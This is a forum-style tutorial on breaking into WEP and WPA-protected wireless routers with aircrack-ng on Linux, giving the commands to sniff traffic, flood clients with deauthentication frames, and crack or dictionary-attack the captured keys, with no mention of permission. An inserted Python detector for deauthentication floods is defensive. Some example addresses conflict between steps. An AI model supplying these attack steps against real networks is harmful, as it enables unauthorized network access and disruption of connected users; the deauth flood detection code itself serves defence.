Kartikey Sapra
Author ti.teg.tnod.I

Note: This tutorial contains few fail-safes; if you run into a problem you can try to post, but Google is probably the best option.

This is a simple guide on hacking wireless routers with WPA/WEP security using aircrack-ng on Linux, by ti.teg.tnod.I. Everything in this guide may work on Windows but is untested.

Whenever I refer to a device, SSID, MAC address, etc., fill in the information YOU have gathered.


Okay, the first thing you should do (unless you already know your wireless device's name) is run "iwconfig" to get the name of your wireless device. You should see something like this:

lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11bg ESSID:"dlink"
Mode:Managed Frequency:2.437 GHz Access Point: 00:1E:58:02:00:40
Bit Rate=54 Mb/s Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Power Management:off
Link Quality=63/100 Signal level:-48 dBm Noise level=-68 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

pan0 no wireless extensions.

(All commands from here on need root access.)

In this case the wireless device is "wlan0". The next thing you need to do is put that device into "monitor mode", in which the card captures every 802.11 frame on the channel rather than only the frames addressed to it, so you can observe what's going on around you. You can do this by running:

airmon-ng start wlan0

Which should return something similar to:

Interface Chipset Driver

wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode enabled on mon0)

What we want from this is "mon0", the monitor-mode interface we will use from now on. Now we want to know what's going on around us. To do that, run:

airodump-ng mon0

This displays a window that's pretty self-explanatory; it should look like this:

CH 2 ][ Elapsed: 44 s ][ 2009-03-19 20:21

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink

BSSID STATION PWR Rate Lost Packets Probes

00:1E:58:02:00:40 00:16:CF:1A88 0 1- 0 0 56 dlink
(not associated) 00:1F:3B:22:09:E3 196 0- 1 8 9 dlink

Now see "00:1E:58:02:00:40 204 129 46 0 6 54. WPA2 CCMP PSK dlink"? The 46 is the amount of IVs obtained (used for cracking the password), the 0 is the amount of IVs obtained per second, WPA2 is the type of security used (you need this to be WEP for this tutorial), and "00:1E:58:02:00:40" is the router's BSSID. The clients are listed in the lower section. Now note the channel the router is on (in this case 6). After you have done that, terminate airodump-ng to free resources; closing the terminal won't stop it, so run something like "killall airodump-ng" (needs root). Once the previous airodump-ng has been terminated, run:

airodump-ng -c 6 --bssid 00:13:A3:0B:98:83 -w dump mon0

This is pretty self-explanatory in my opinion: "6" is the channel, "00:13:A3:0B:98:83" is the BSSID of the router, "dump" is the prefix of the capture files (you'd be fine not touching that), and mon0 is the device. You should now see a screen similar to the previous one, just with less clutter, because airodump-ng is only watching that channel and that router, and it is logging all the IVs to a file.

You probably want to wait until the amount of "#Data" you've collected reaches 30 000 - 80 000 before trying to crack the password. If it's going slowly (0-1 IVs a second), try deauthenticating the client, which forces it to reconnect and generate more traffic. There may be a better way than doing this, but this method is the best method I know of that works. To deauthenticate a client, first get its MAC address (located under "STATION") and then run:

aireplay-ng -0 70 -a 00:13:A3:0B:98:83 -c 00:1A:73:FA:1C:12 mon0

Okay, -0 means deauthentication; 70 is how many deauths to send (you probably want 50-100; don't set a large number such as 1024, as the client may stop generating IVs for a while); "00:13:A3:0B:98:83" is the BSSID of the access point; "00:1A:73:FA:1C:12" is the MAC address of the client you're deauthing; and mon0 is the device. You shouldn't run this if you're already getting a decent amount of IVs (more than 0 a second), as it could slow down the process. You may run this as many times as needed.
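The deauthentication burst above is also exactly what a wireless intrusion detection system looks for: a legitimate disconnect is one or two frames, while "aireplay-ng -0 70" sends dozens in seconds. The following detector is an added example written for this page, not code from the original post or from the aircrack-ng project; the frame records, timings and reason codes are constructed, and a real deployment would feed it frames decoded from a monitor-mode capture.

```python
# Added example (not from the original post): sliding-window detector for
# 802.11 deauthentication floods such as those produced by aireplay-ng -0.
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12      # management frame subtype 12 = deauthentication
BEACON_SUBTYPE = 8       # management frame subtype 8 = beacon
BROADCAST = "ff:ff:ff:ff:ff:ff"


class DeauthFloodDetector:
    """Alerts when a (bssid, client) pair sees >= threshold deauth frames
    within any `window` seconds. One deque of timestamps per pair keeps
    memory bounded by the number of distinct pairs, not by frame volume."""

    def __init__(self, threshold=10, window=5.0):
        self.threshold = threshold
        self.window = window
        self._times = defaultdict(deque)

    def observe(self, ts, subtype, bssid, dst, reason=0):
        """Feed one frame record; returns an alert string or None."""
        if subtype != DEAUTH_SUBTYPE:
            return None                      # beacons, data, etc. are ignored
        key = (bssid.lower(), dst.lower())
        q = self._times[key]
        q.append(ts)
        while q and ts - q[0] > self.window:  # drop frames outside the window
            q.popleft()
        if len(q) < self.threshold:
            return None
        q.clear()                            # one alert per burst, not per frame
        return (f"deauth flood: {self.threshold} frames within {self.window}s "
                f"from {key[0]} to {key[1]} (reason code {reason})")


def detect(frames, threshold=10, window=5.0):
    """Run the detector over (ts, subtype, bssid, dst, reason) records."""
    det = DeauthFloodDetector(threshold, window)
    return [a for a in (det.observe(*f) for f in frames) if a]


def build_sample_frames():
    """Constructed sample: one ordinary disconnect (reason 3, station
    leaving), then a burst resembling 'aireplay-ng -0 70' (70 deauths at
    0.1 s spacing, reason 7) against one client, interleaved with beacons."""
    ap, client = "00:1e:58:02:00:40", "00:1a:73:fa:1c:12"
    frames = [(0.0, DEAUTH_SUBTYPE, ap, client, 3)]
    frames += [(5.0 + 0.1 * i, DEAUTH_SUBTYPE, ap, client, 7) for i in range(70)]
    frames += [(0.5 * i, BEACON_SUBTYPE, ap, BROADCAST, 0) for i in range(30)]
    return sorted(frames, key=lambda f: f[0])
```

With the defaults, the single benign disconnect never trips the threshold, while the 70-frame burst raises one alert per ten deauths.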

Now, finally, if you think you have enough IVs (if you don't, you can always repeat the previous step), you can make an attempt at the password:

aircrack-ng -b 00:13:A3:0B:98:83 dump-01.cap

Okay, "00:13:A3:0B:98:83" is the BSSID of the router and "dump-01.cap" is the file where the IVs are located. Alternatively, you may run something like:

aircrack-ng -b 00:13:A3:0B:98:83 dump*.cap

That will include all the capture files with the prefix "dump" if they've been split across several files. If aircrack-ng seems to hang and doesn't sort itself out within 45-60 seconds, feel free to terminate it and try again after another 5000-10 000 IVs.

I hope this guide is clear. Any questions or comments, feel free to post or PM me. I will do the WPA summary later, but this is a quick breakdown (which is just a list of commands, really):

sudo airmon-ng start wlan0
#Get the MAC address of your access point (00:1E:58:02:00:40)
#Channel 6 (2.437GHz)
sudo airodump-ng -c 6 --bssid 00:1E:58:02:00:40 -w psk mon0
# -0 means deauthentication
# 1 is the number of deauths to send (you can send multiple if you wish)
# -a 00:1E:58:02:00:40 is the MAC address of the access point
# -c 00:1A:73:FA:1C:12 is the MAC address of the client you are deauthing
sudo aireplay-ng -0 1 -a 00:1E:58:02:00:40 -c 00:1A:73:FA:1C:12 mon0
sudo aircrack-ng -w dictionary_english.dic -b 00:1E:58:02:00:40 psk*.cap